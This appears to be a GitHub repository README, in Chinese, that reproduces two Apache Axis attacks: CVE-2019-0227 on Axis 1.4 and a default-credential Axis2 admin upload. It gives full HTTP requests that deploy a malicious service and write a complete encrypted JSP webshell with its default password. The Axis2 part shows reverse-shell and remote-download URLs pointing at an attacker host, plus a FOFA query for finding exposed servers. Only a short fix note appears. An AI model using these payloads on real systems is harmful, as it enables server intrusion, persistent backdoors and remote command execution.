├── README.md
├── assets
    ├── imageimage-20220910103745320-16627967497663.png
    ├── imageimage-20220910103745320.png
    ├── imageimage-20220910103805828.png
    ├── imageimage-20220910115441502.png
    ├── imageimage-20220910115547702.png
    ├── imageimage-20220910115606129.png
    ├── imageimage-20220910123312503.png
    ├── imageimage-20220910123340127.png
    ├── imageimage-20220910124051454.png
    ├── imageimage-20220910124118784.png
    ├── imageimage-20220910124127190.png
    ├── imageimage-20220910132948620.png
    ├── imageimage-20220910133003379.png
    └── imageimage-20220910133125782.png
└── axis.zip


/README.md:
--------------------------------------------------------------------------------
  1 | ## 1.什么是Axis
  2 | 
  3 | ```
  4 | axis全称Apache Extensible Interaction System 即阿帕奇可扩展交互系统。Axis本质上就是一个SOAP引擎，提供创建服务器端、客户端和网关SOAP操作的基本框架。Axis版本是为Java编写的，不过为C++的版本正在开发中。但Axis并不完全是一个SOAP引擎，它还是一个独立的SOAP服务器和一个嵌入Servlet引擎（例如Tomcat）的服务器。
  5 | ```
  6 | 
  7 | ## 2.CVE-2019-0227
  8 | 
  9 | [Apache](https://so.csdn.net/so/search?q=Apache&spm=1001.2101.3001.7020) Axis 1.4 远程代码执行
 10 | 
 11 | ### 2.1漏洞原理
 12 | 
 13 | ```
 14 | Axis 1.4 adminservice开启远程访问，此时攻击者可通过 services/AdminService 服务 部署一个webservice , webservice开启一个写文件服务 , 攻击者可以写入任意文件 , getshell
 15 | ```
 16 | 
 17 | ### 2.2影响范围
 18 | 
 19 | ```
 20 | Axis <=1.4 
 21 | enableRemoteAdmin 设置为True , 默认是false
 22 | ```
 23 | 
 24 | ### 2.3环境搭建
 25 | 
 26 | ```
 27 | tomcat +apache Axis 1.4 
 28 | 解压 axis.zip 放到tomcat目录下 webapp 下即可 , 里面的配置 , 已经配置好了
 29 | ```
 30 | 
 31 | ![image-20220910103745320](./assets/imageimage-20220910103745320-16627967497663.png)
 32 | 
 33 | 然后访问
 34 | 
 35 | ```
 36 | http://192.168.0.78:8080/axis/
 37 | ```
 38 | 
 39 | ![image-20220910103805828](./assets/imageimage-20220910103805828.png)
 40 | 
 41 | 环境搭建成功 , 访问 
 42 | 
 43 | ```
 44 | http://192.168.0.78:8080/axis/servlet/AdminServlet
 45 | ```
 46 | 
 47 | 生成 server-config.wsdd , 这里靶机环境已经提前配置好 , 不需要访问也行
 48 | 
 49 | ### 2.4漏洞复现
 50 | 
 51 | POC1：开启写文件功能，并指定写入路径 , **注意路径**
 52 | 
 53 | ```
 54 | POST /axis/services/AdminService HTTP/1.1
 55 | Host: 192.168.0.78:8080
 56 | Connection: close
 57 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 58 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
 59 | Accept-Language: en-US,en;q=0.5
 60 | SOAPAction: something
 61 | Upgrade-Insecure-Requests: 1
 62 | Content-Type: application/xml
 63 | Accept-Encoding: gzip, deflate
 64 | Content-Length: 777
 65 | 
 66 | <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" >
 67 |   <soap:Body>
 68 |     <deployment
 69 |       xmlns="http://xml.apache.org/axis/wsdd/"
 70 |       xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
 71 |         <service name="randomAAA" provider="java:RPC">
 72 | <requestFlow>
 73 |             <handler type="java:org.apache.axis.handlers.LogHandler" >
 74 |                 <parameter name="LogHandler.fileName" value="../webapps/ROOT/shell.jsp" />
 75 |                 <parameter name="LogHandler.writeToConsole" value="false" />
 76 |             </handler>
 77 |         </requestFlow>
 78 |           <parameter name="className" value="java.util.Random" />
 79 |           <parameter name="allowedMethods" value="*" />
 80 |         </service>
 81 |     </deployment>
 82 |   </soap:Body>
 83 | </soap:Envelope>
 84 | ```
 85 | 
 86 | ![image-20220910115547702](./assets/imageimage-20220910115547702.png)
 87 | 
 88 | 把冰蝎马写入文件内容 , 虽然影响是500 , 但是已经写进入了
 89 | 
 90 | ```
 91 | POST /axis/services/RandomService HTTP/1.1
 92 | Host: 127.0.0.1:8080
 93 | Connection: close
 94 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 95 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
 96 | Accept-Language: en-US,en;q=0.5
 97 | SOAPAction: something
 98 | Upgrade-Insecure-Requests: 1
 99 | Content-Type: application/xml
100 | Accept-Encoding: gzip, deflate
101 | Content-Length: 1157
102 | 
103 | <?xml version="1.0" encoding="utf-8"?>
104 |         <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
105 |         xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
106 |         xmlns:xsd="http://www.w3.org/2001/XMLSchema"
107 |         xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
108 |         <soapenv:Body>
109 |         <api:main
110 |         soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
111 |             <api:in0><![CDATA[
112 | <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
113 | ]]>
114 |             </api:in0>
115 |         </api:main>
116 |   </soapenv:Body>
117 | </soapenv:Envelope>
118 | ```
119 | 
120 | ![image-202209101129](./assets/imageimage-20220910115606129.png)
121 | 
122 | 一次写入不成功可能需要多次写入
123 | 
124 | 使用冰蝎链接
125 | 
126 | ```
127 | http://192.168.0.78:8080/shell.jsp
128 | rebeyond
129 | ```
130 | 
131 | ![image-20220910115441502](./assets/imageimage-20220910115441502.png)
132 | 
133 | ### 2.5修复建议
134 | 
135 | ```
136 | 默认情况下service远程管理没开启，也即配置文件中enableRemoteAdmim为false，也就是只能本地localhost访问，这种情况下可以结合ssrf和xxe进行利用，所以比较鸡肋，但是安全无小事，对于命令执行漏洞还是应该重视。修复的话，关闭admin服务即可，具体方法注释掉web-inf/web.xml 里的AdminServlet，然后重启tomcat
137 | ```
138 | 
139 | ### 2.6漏洞总结
140 | 
141 | ```
142 | 漏洞分析篇幅不是很长，整体来说这个漏洞其实就是一个文件任意写入，但由于这个组件的一些特性。即通过server-config.wsdd来初始化和配置service，那么就可以写入一个恶意的service，到该文件中，进行调用实现RCE的效果。在复现漏洞中，发现需要/servlet/AdminServlet取消这个路由的注释，实际上在测试中发现，访问该路由会自动生成server-config.wsdd文件，我们需要的是该文件。有server-config.wsdd文件，/servlet/AdminServlet存不存在就显得没那么重要了。至此再一次佩服漏洞挖掘者。
143 | ```
144 | 
145 | 补充
146 | 
147 | ```
148 | https://xz.aliyun.com/t/5513
149 | https://www.cxyck.com/article/131848.html
150 | ```
151 | 
152 | ## 3.Axis2后台弱口令上传arr包Getshell
153 | 
154 | ### 3.1Axis2介绍
155 | 
156 | ```
157 | Axis2是下一代 Apache Axis。Axis2 虽然由 Axis 1.x 处理程序模型提供支持，但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写，而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构，这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议（如 WS-Security、WS-ReliableMessaging 等）的实现中。
158 | 
159 | Apache Axis2 是Axis的后续版本，是新一代的SOAP引擎。
160 | ```
161 | 
162 | ### 3.2环境搭建
163 | 
164 | ```
165 | tomcat + Axis2 war包部署
166 | https://dlcdn.apache.org/axis/axis2/java/core/1.6.1/axis2-1.6.1-war.zip   
167 | 
168 | # 新版本竟然不支持不配置service的方式
169 | 如果不确定服务器运行时的axis2版本，可以通过webapps/axis2/WEB-INF/services查看，或者使用http://server:port/axis2/services/Version?wsdl获取版本号
170 | 
171 | fofa
172 | title="Axis 2 - Home"
173 | ```
174 | 
175 | ### 3.3漏洞复现
176 | 
177 | 访问
178 | 
179 | ```
180 | http://192.168.0.78:8080/axis2/
181 | ```
182 | 
183 | ![image-20220910123312503](./assets/imageimage-20220910123312503.png)
184 | 
185 | 点击 Administration
186 | 
187 | ![image-20220910123340127](./assets/imageimage-20220910123340127.png)
188 | 
189 | ```
190 | admin
191 | axis2
192 | ```
193 | 
194 | 上传.aar包 , 推荐一个axis2的webshell  
195 | 
196 | ```
197 | https://github.com/Svti/Axis2Shell ( 推荐 config.aar包 ) 
198 | ```
199 | 
200 | ![image-20220910124051454](./assets/imageimage-20220910124051454.png)
201 | 
202 | ![image-20220910124127190](./assets/imageimage-20220910124127190.png)
203 | 
204 | ![image-20220910124118784](./assets/imageimage-20220910124118784.png)
205 | 
206 | 查看参数
207 | 
208 | ```
209 | http://ip:8080/axis2/services/config?wsdl
210 | ```
211 | 
212 | ![image-20220910132948620](./assets/imageimage-20220910132948620.png)
213 | 
214 | 执行系统命令
215 | 
216 | ```
217 | http://ip:8080/services/config/exec?cmd=whoami
218 | ```
219 | 
220 | ![image-20220910133003379](./assets/imageimage-20220910133003379.png)
221 | 
222 | 查看class的路径 , 方便文件上传
223 | 
224 | ```
225 | http://ip:8080/services/config/getClassPath
226 | ```
227 | 
228 | ![image-20220910133125782](./assets/imageimage-20220910133125782.png)
229 | 
230 | 反弹shell
231 | 
232 | ```
233 | http://ip:8080/services/config/shell?host=ip&port=5656
234 | ```
235 | 
236 | 写入冰蝎马
237 | 
238 | ```
239 | http://ip:8080/services/config/download?url=http://ip:8000/mm.txt&path=C:/apache-tomcat-7.0.57/webapps1/axis2/jkl.jsp
240 | ```
241 | 
242 | 冰蝎连接
243 | 
244 | ```
245 | http://ip:8080/axis2/jkl.jsp
246 | rebeyond
247 | ```
248 | 


--------------------------------------------------------------------------------
/assets/imageimage-20220910103745320-16627967497663.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910103745320-16627967497663.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910103745320.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910103745320.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910103805828.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910103805828.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910115441502.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910115441502.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910115547702.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910115547702.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910115606129.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910115606129.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910123312503.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910123312503.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910123340127.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910123340127.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910124051454.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910124051454.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910124118784.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910124118784.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910124127190.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910124127190.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910132948620.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910132948620.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910133003379.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910133003379.png


--------------------------------------------------------------------------------
/assets/imageimage-20220910133125782.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/assets/imageimage-20220910133125782.png


--------------------------------------------------------------------------------
/axis.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1derian/Apache-Axis-Vuln/5e9a9b86f8babb19f020b8e63fd7fb5a0b772664/axis.zip


--------------------------------------------------------------------------------